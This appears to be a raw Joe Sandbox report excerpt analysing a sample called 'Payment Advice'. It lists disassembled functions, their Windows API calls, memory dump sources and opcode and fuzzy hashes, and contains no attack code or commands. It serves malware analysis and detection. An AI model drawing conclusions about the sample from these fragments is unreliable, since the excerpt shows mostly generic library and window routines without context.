lstrlenW.KERNEL32(?,00000002,?,?,?,?,005C187A,00000000,000000EF,00000119,?,?,00000000), ref: 005C0AD4
lstrcpyW.KERNEL32(00000000,?), ref: 005C0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,005C187A,00000000,000000EF,00000119,?,?,00000000), ref: 005C0B2E

Strings

cdecl, xrefs: 005C0B25

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 5ed3cf26943e77c884c13a61dfff817da28c804bdbaaebd2463884d49141db2d
Instruction ID: 61d77e49ca7b9ab10c56202033afb4cbda61b507deccfa85f8bd11c20abe3b5c
Opcode Fuzzy Hash: 5ed3cf26943e77c884c13a61dfff817da28c804bdbaaebd2463884d49141db2d
Instruction Fuzzy Hash: 86118136200305EFDB25AFA4DC45E7E7BA9FF45354B80516EE906CB290EB719C50C7A0

Function 005B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005B2FB5

Part of subcall function 005A395C: __FF_MSGBANNER.LIBCMT ref: 005A3973
Part of subcall function 005A395C: __NMSG_WRITE.LIBCMT ref: 005A397A
Part of subcall function 005A395C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000001,00000000,?,?,0059F507,?,0000000E), ref: 005A399F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1c8834e53baf184076e4f3950d7c84bc2057a29f3023b29000dcf8af03d447f3
Instruction ID: 529dc2451361c862008db711238392f6ce7b6567ab0a8706c066132f81ba37e7
Opcode Fuzzy Hash: 1c8834e53baf184076e4f3950d7c84bc2057a29f3023b29000dcf8af03d447f3
Instruction Fuzzy Hash: CC110A3144961BABDB353FB4AC1D6AE3F94BF4A370F204925F80996151DB30DD408AA0

Function 0059EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0059EBB2

Part of subcall function 005851AF: _memset.LIBCMT ref: 0058522F
Part of subcall function 005851AF: _wcscpy.LIBCMT ref: 00585283
Part of subcall function 005851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00585293

KillTimer.USER32(?,00000001,?,?), ref: 0059EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0059EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005F3C88

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f67d6476a920fc9c5e1110d94923be380976c19cc1ee5be4147514151c4a759e
Instruction ID: 22b33682bf9fa65fd923a7ac3550418f326413900c109f6150d4570e65ef1c55
Opcode Fuzzy Hash: f67d6476a920fc9c5e1110d94923be380976c19cc1ee5be4147514151c4a759e
Instruction Fuzzy Hash: EA21C5705047849FFB33DB288859BE7BFEDAF01308F04049DE68A67282D7746E848B51

Function 005C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 005C05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005C05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005C05DD
FreeLibrary.KERNEL32(?), ref: 005C0632

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 6430bcc47a01e963227b242f8417804be1c6f27bc660847493623c995a88de87
Instruction ID: 5b3f0cb0c4cdc55d3293dfc19cf8142205d2b9c18af78b0c4a3909355dd2a4d1
Opcode Fuzzy Hash: 6430bcc47a01e963227b242f8417804be1c6f27bc660847493623c995a88de87
Instruction Fuzzy Hash: 0E215971940209EFDB20CFD1DC88FDABFB8FB80700F00A96DA516A2090DB70EA959B50

Function 005C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005C6733
_memset.LIBCMT ref: 005C6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005C67A6
CloseHandle.KERNEL32(00000000), ref: 005C67AF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d266f805348d1f87c8ec4f1fdd108ab484d9981b60d7ab20d5cc6c3dab5bc3bc
Instruction ID: a6268c54c45be210f4669b81b53601a6bdf191daed7ebd9a946cf293db35d166
Opcode Fuzzy Hash: d266f805348d1f87c8ec4f1fdd108ab484d9981b60d7ab20d5cc6c3dab5bc3bc
Instruction Fuzzy Hash: C91106729012287AE7209BA5AC4DFABBABCEF44764F10469AF504E71C0D2744F808BA4

Function 005BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005BAA79
Part of subcall function 005BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005BAA83
Part of subcall function 005BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005BAA92
Part of subcall function 005BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005BAA99
Part of subcall function 005BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005BAAAF

GetLengthSid.ADVAPI32(?,00000000,005BADE4,?,?), ref: 005BB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 005BB227
HeapAlloc.KERNEL32(00000000), ref: 005BB22E
CopySid.ADVAPI32(?,00000000,?), ref: 005BB247

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 4da1988d97f01f1586567654733db824ea0af523adce951a7728c2a46f23b395
Instruction ID: 2e714d6868d5dd580e6a9a4fc151c6cb42405e24db8e858243404f41e42fa288
Opcode Fuzzy Hash: 4da1988d97f01f1586567654733db824ea0af523adce951a7728c2a46f23b395
Instruction Fuzzy Hash: C2119E75A00205EFEB049F98DC85AEFBBAAFF85304F14906DE94297210D7B1AE44CB20

Function 005BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 005BB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005BB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005BB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005BB4DB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9be1923f40c7e3971403d7f4e42a3bea1381fdec519cbd69d630778cf734fd09
Instruction ID: 7fa5cc752d687b7210259e576443097c3246f57bd7447c70ea3a7dfdeb41f5b7
Opcode Fuzzy Hash: 9be1923f40c7e3971403d7f4e42a3bea1381fdec519cbd69d630778cf734fd09
Instruction Fuzzy Hash: 5411367A900218BFEF11DBA8C985EDDBBB5FB08700F204091E604A7290D7B1AE10DB94

Function 0059B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0059B5A5
GetClientRect.USER32(?,?), ref: 005FE69A
GetCursorPos.USER32(?), ref: 005FE6A4
ScreenToClient.USER32(?,?), ref: 005FE6AF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 93cd4b9e01255a024ee509e791b96b4d3b08c3f1a358f5cbeab8e084467579f3
Instruction ID: 3ba32354e1fdbe43b6675f23f0d19cab5e9a33180c9505215d35fbc1d4598515
Opcode Fuzzy Hash: 93cd4b9e01255a024ee509e791b96b4d3b08c3f1a358f5cbeab8e084467579f3
Instruction Fuzzy Hash: BA11363190002ABBEF10DF98ED4A9EE7BBAFF49304F410451E901E7150E734AA81CBA1

Function 005C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005C7352
MessageBoxW.USER32(?,?,?,?), ref: 005C7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005C739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005C73A2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b73c26885d23bce65bc19d238cec3d48b3af3ae79dfd0d4eb49ea5928e0ae3e7
Instruction ID: 178083bc79e0095a1fc5835f6046e8af73db2475116ee558e71a4cc192e8b458
Opcode Fuzzy Hash: b73c26885d23bce65bc19d238cec3d48b3af3ae79dfd0d4eb49ea5928e0ae3e7
Instruction Fuzzy Hash: 9B11A576A04258BFC7019BE8DC05F9F7FABAB49364F144359F925D3251D6B08A009BA1

Function 0059D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0059D1BA
GetStockObject.GDI32(00000011), ref: 0059D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0059D1D8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5b26d52e57d0d725215d266cd9a2310d4e685022e1c12653e1b6936a4c022c87
Instruction ID: 2a14bf0e73f007b1b8f7bf3804034d60c522c5931328441b97163c59849af74f
Opcode Fuzzy Hash: 5b26d52e57d0d725215d266cd9a2310d4e685022e1c12653e1b6936a4c022c87
Instruction Fuzzy Hash: 82118773101609BFEF024FA09C55EEABF6AFF093A4F040202FA1552060C7329C60EBA0

Function 005B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 005B4E16

Part of subcall function 005B54F5: __fltout2.LIBCMT ref: 005B551E

__cftog_l.LIBCMT ref: 005B4E3C
__cftoe_l.LIBCMT ref: 005B4E6E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 516d5a1d47cc6d2199b9664b7afb81ed725c901e1496e7786dae01a2cb5c99a6
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 31014C3200014EBBCF265E84DC058EE3F6BBB58350B588455FE1859132D336EAB1AF82

Function 005A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005A7A0D: __getptd_noexit.LIBCMT ref: 005A7A0E

__lock.LIBCMT ref: 005A748F
InterlockedDecrement.KERNEL32(?), ref: 005A74AC
_free.LIBCMT ref: 005A74BF
InterlockedIncrement.KERNEL32(0178A8E8), ref: 005A74D7

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 8d6332b7659dd4a8c3fac3daaa2971dcbc96ed7cd3551f60b9e580f01b34fd68
Instruction ID: 2641c669ca54a4638f8e58112ebf48d618054cd9280ff2643873894bb8557794
Opcode Fuzzy Hash: 8d6332b7659dd4a8c3fac3daaa2971dcbc96ed7cd3551f60b9e580f01b34fd68
Instruction Fuzzy Hash: D201D232909B2AABDB12AFA49D0975DBF61BF4F721F154019F854A3680CB305D01DFD2

Function 005EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0059AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0059AFE3
Part of subcall function 0059AF83: SelectObject.GDI32(?,00000000), ref: 0059AFF2
Part of subcall function 0059AF83: BeginPath.GDI32(?), ref: 0059B009
Part of subcall function 0059AF83: SelectObject.GDI32(?,00000000), ref: 0059B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 005EEA8E
LineTo.GDI32(00000000,?,?), ref: 005EEA9B
EndPath.GDI32(00000000), ref: 005EEAAB
StrokePath.GDI32(00000000), ref: 005EEAB9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: bb48c031ed86dbaf238485ce446308d95af24533d2c89622784a58cf8e2da372
Instruction ID: b10778355750b350e29497bdae7bca4d5ab278f40c3d761604fd51933ef26d13
Opcode Fuzzy Hash: bb48c031ed86dbaf238485ce446308d95af24533d2c89622784a58cf8e2da372
Instruction Fuzzy Hash: F9F05E31085259BBDB129F94AC0EFCB3F1AAF06311F084201FE16650E187749651CBE9

Function 005BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005BC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 005BC85D
GetCurrentThreadId.KERNEL32 ref: 005BC864
AttachThreadInput.USER32(00000000), ref: 005BC86B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b28f323edbd9bd85e7248915d8b4d3ea0d28e82262a308815db2ba5c25feb5f6
Instruction ID: f97142b70aec475b591d8f1c6f75b1d6f7af70f5483bf093c7a61269ef329524
Opcode Fuzzy Hash: b28f323edbd9bd85e7248915d8b4d3ea0d28e82262a308815db2ba5c25feb5f6
Instruction Fuzzy Hash: 9CE06D71182228BADB201FA2DC0DEDB7F1DEF067A1F008121B60D95460C6B2D580CBE0

Function 005BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 005BB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,005BAC9D), ref: 005BB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005BAC9D), ref: 005BB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,005BAC9D), ref: 005BB0F1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 967161c0b72e00e5897808c5848bdd8ef89627e99a961320612cdd3b25d92144
Instruction ID: 69785cd2d2625bcfdaece0e1d0a31149130124c6462f9ac8cf605289a76cabec
Opcode Fuzzy Hash: 967161c0b72e00e5897808c5848bdd8ef89627e99a961320612cdd3b25d92144
Instruction Fuzzy Hash: 79E086726812119BE7202FF15C0CF973BADFF55791F018918F246D6040DBB49401C760

Function 0059B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0059B496
SetTextColor.GDI32(?,000000FF), ref: 0059B4A0
SetBkMode.GDI32(?,00000001), ref: 0059B4B5
GetStockObject.GDI32(00000005), ref: 0059B4BD
GetWindowDC.USER32(?,00000000), ref: 005FDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 005FDE38
GetPixel.GDI32(00000000,?,00000000), ref: 005FDE51
GetPixel.GDI32(00000000,00000000,?), ref: 005FDE6A
GetPixel.GDI32(00000000,?,?), ref: 005FDE8A
ReleaseDC.USER32(?,00000000), ref: 005FDE95

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: b6e831567407eec1828f4394a3e4fe96ee4c893574f6b66b6a0bc599064a8ad0
Instruction ID: 721290d0ae997c763bbd20d36bb910daa560fd7f08c6423034a49056525b67a3
Opcode Fuzzy Hash: b6e831567407eec1828f4394a3e4fe96ee4c893574f6b66b6a0bc599064a8ad0
Instruction Fuzzy Hash: 14E06D31140244AAEF211BA4AC0DBE93F22AB12339F00C366FB69980E1C7754980DB21

Function 005BB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 005BB2DF
UnloadUserProfile.USERENV(?,?), ref: 005BB2EB
CloseHandle.KERNEL32(?), ref: 005BB2F4
CloseHandle.KERNEL32(?), ref: 005BB2FC

Part of subcall function 005BAB24: GetProcessHeap.KERNEL32(00000000,?,005BA848), ref: 005BAB2B
Part of subcall function 005BAB24: HeapFree.KERNEL32(00000000), ref: 005BAB32

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 802c8f283e922ac261c14d2abf6a58cb5780bb02d583e67557965a10d86e2a44
Instruction ID: c58eea6e3a3f0ca149d235f9aa4230ff902ca97a9518b2d7138985697c7930c4
Opcode Fuzzy Hash: 802c8f283e922ac261c14d2abf6a58cb5780bb02d583e67557965a10d86e2a44
Instruction Fuzzy Hash: EFE0B63A144006BBCB052BE5EC0885AFFA7FF89361310A321F62581571CB32A871EB91

Function 005FB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005FB29A
GetDC.USER32(00000000), ref: 005FB2A4
